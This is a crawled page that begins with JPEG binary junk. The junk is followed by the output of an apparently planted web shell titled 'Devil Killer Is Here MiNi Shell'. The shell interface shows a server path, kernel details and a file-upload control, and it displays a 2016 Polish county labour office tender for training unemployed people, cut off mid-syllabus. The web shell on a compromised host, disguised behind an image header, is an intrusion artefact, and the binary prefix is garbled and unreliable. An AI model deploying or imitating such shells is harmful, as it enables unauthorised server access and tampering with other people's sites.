JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160413/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160413/87064-N-2016.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób bezrobotnych w wieku 30+ zarejestrowanych w Powiatowym Urzędzie Pracy w Jaworznie (II) w ramach Działania 7.2 Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 87064 - 2016; data zamieszczenia: 13.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób bezrobotnych w wieku 30+ zarejestrowanych w Powiatowym Urzędzie Pracy w Jaworznie (II) w ramach Działania 7.2 Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób bezrobotnych w wieku 30+ zarejestrowanych w Powiatowym Urzędzie Pracy w Jaworznie (II) w ramach Działania 7.2 Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego w następujących zakresach: 
zakres I:  Murarz - tynkarz - 5 osób w I edycji,
zakres II: Kurs spawania blach i rur  spoinami  pachwinowymi - proces spawania 135 oraz proces                     spawania 131 - 5 osób w I edycji,
zakres III:  Pracownik ds. kadr i płac - 5 osób w I edycji,
zakres IV:   Pomoc kuchenna - 10 osób w I edycji
zakres V:   Magazynier z obsługą wózka jezdniowego i egzaminem UDT - 10 osób w I edycji,
zakres VI:   Uprawnienia SEP do 1 kV - 5 osób w I edycji,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki
 i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych /tekst jednolity: Dz. U. z 2014r, poz. 781/
1.1.2	Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdziale 6 ust.3 pkt 3.1 i pkt 3.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał,
że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej dwie usługi odpowiadające swoim rodzajem przedmiotowi zamówienia:
1)  zakres I - wykonał co najmniej dwie usługi szkoleniowe z zakresu Murarz - tynkarz na minimum 5 osób . Zamawiający uzna również warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: Murarz oraz Tynkarz. Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu Murarz - tynkarz . Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
2) zakres II wykonał co najmniej dwie usługi z zakresu Kurs spawania blach i rur spoinami pachwinowymi - proces spawania 135 oraz proces spawania 131 na minimum 5 osób. Zamawiający uzna  warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: Kurs spawania blach i rur  spoinami  pachwinowymi - proces spawania 135 oraz  Kurs spawania blach i rur spoinami  pachwinowymi - proces spawania 131. 
Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu spawanie blach i rur spoinami pachwinowymi - proces spawania 135 oraz proces spawania 131.  Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
3) zakres III  wykonał co najmniej dwie usługi szkoleniowe z zakresu Pracownik ds. kadr i płac na minimum 5 osób. Zamawiający uzna  warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: pracownik ds. kadr oraz pracownik  ds. płac. Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu  Pracownik ds. kadr i płac. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.          
4) zakres IV  wykonał co najmniej dwie usługi z zakresu Pomoc kuchenna na minimum                   10 osób. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
5) zakres V  wykonał co najmniej dwie usługi szkoleniowe z zakresu Magazynier z obsługą wózka jezdniowego i egzaminem UDT na minimum 10 osób. Zamawiający uzna również warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: Magazynier oraz Operator-kierowca wózka jezdniowego wraz z wymianą butli gazowych oraz egzaminem UDT. Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu Magazynier z obsługą wózka jezdniowego i egzaminem UDT. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
6) zakres VI wykonał co najmniej dwie usługi szkoleniowe z zakresu Uprawnienia SEP do 1 kV na minimum 5 osób Zamawiający uzna również warunek za spełniony
w przypadku realizacji szkoleń o innej nazwie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera. 
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6 ust.4 pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy
do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1)  wykładowcy prowadzący zajęcia teoretyczne muszą posiadać wykształcenie wyższe związane z tematyką prowadzonej jednostki modułowej lub wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
W przypadku jednostki modułowej: obsługa wózków jezdniowych wraz z wyminą butli gazowych oraz obsługa kasy fiskalnej i terminali płatniczych Zamawiający dopuszcza możliwość prowadzenia szkolenia przez wykładowców posiadających wykształcenie minimum średnie oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
2) wykładowcy prowadzący zajęcia praktyczne oraz ćwiczenia muszą posiadać co najmniej	wykształcenie średnie związane z tematyką prowadzonej jednostki modułowej lub	wykształcenie średnie oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć 	dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
3) każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie 	zawodowe w prowadzeniu zajęć  dydaktycznych zgodnych z tematyką prowadzonej jednostki 	modułowej;
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym (np. pomieszczenia, sprzęt, maszyny urządzenia itp.), osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, które Wykonawca przedstawia w wykazie. Powyższe zobowiązanie powinno zostać złożone w oryginale lub winno być poświadczone notarialnie.
2.Oświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy wojewódzki urząd pracy. (zał. nr 10 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - posiadanie certyfikatu jakości usług - 0.1</li>
<li>3 - prowadzenie analiz skuteczności i efektywności przeprowadzanych szkoleń - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1) osób prowadzących szkolenie. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie 	uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było 	wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania 	przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu 
     pisemnie propozycję  zmiany  wraz  z  jej  uzasadnieniem,    wskazując  osobę/y o  co  najmniej
	porównywalnych kwalifikacjach jakie określono w SIWZ. Jednocześnie Wykonawcy nie	przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany	osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przedmiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego
	w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której	nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu	realizacji szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie	propozycję zmiany wraz z jej uzasadnieniem. Zmiana terminu szkolenia  - w szczególnie	uzasadnionych przypadkach, np. niezakwalifikowanie się odpowiedniej liczby	uczestników szkolenia - może także nastąpić z inicjatywy Zamawiającego.	Jednocześnie Wykonawcy nie  przysługuje roszczenie o zwrot kosztów wynikających	bezpośrednio lub pośrednio ze zmiany terminu realizacji przedmiotu zamówienia.
3) miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego,                           	w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca	przeprowadzenia szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu	pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca 	szkolenia o co najmniej porównywalnych warunkach jakie określono w SIWZ, przy	jednoczesnym spełnieniu warunku, o którym mowa w Rozdziale 3, pkt. 3, ppkt. 3.1 SIWZ. 	Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających 	bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4) zmniejszenia ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych przypadkach tj. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym dokonanie  kolejnego  naboru, brak  osób  spełniających  warunki  skierowania  na szkolenie, Zamawiający może zmniejszyć ilość skierowanych na szkolenie maksymalnie o 1 osobę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-jaworzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9b, 43-600 Jaworzno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2016 godzina 08:00, miejsce: Ofertę należy złożyć w siedzibie Powiatowego Urzędu Pracy w Jaworznie przy ulicy Północnej 9b, I  piętro, pokój nr 124,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu Aktywizacja osób bezrobotnych w wieku 30+ zarejestrowanych                                   w Powiatowym Urzędzie Pracy w Jaworznie (II) w ramach Działania 7.2 Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I. Zakres Murarz - tynkarz -5 osób w jednej edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin - 180, w tym minimum 145 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: murarz/tynkarz (kod zawodu: 712102) i tynkarz (kod zawodu: 713302) z następującymi jednostkami modułowymi: 
1) rysunek techniczny dla murarzy:
- wymiarowanie i oznaczenie elementów na rysunkach;
- wykonywanie szkiców; 
- podziałki; 
- rodzaje i podział dokumentacji budowlanej; 
- oznaczenia graficzne; 
- rzuty i przekroje;
- narzędzia pomiarowe. 
2) materiały budowlane do robót murarskich:
- BHP na stanowisku pracy;
- materiały budowlane z kamienia naturalnego; 
- ceramiczne materiały budowlane;
- materiały budowlane betonowe, cementowe, gipsowe, silikatowe i z betonu komórkowego;
-materiały budowlane do zapraw; 
- materiały budowlane ze szkła;
- materiały izolacyjne;
- inne materiały budowlane;
- sprzęt specjalistyczny i pomocniczy;
3) przygotowanie zapraw murarskich:
- BHP przy obsłudze narzędzi i sprzętu;
- BHP na stanowisku pracy; 
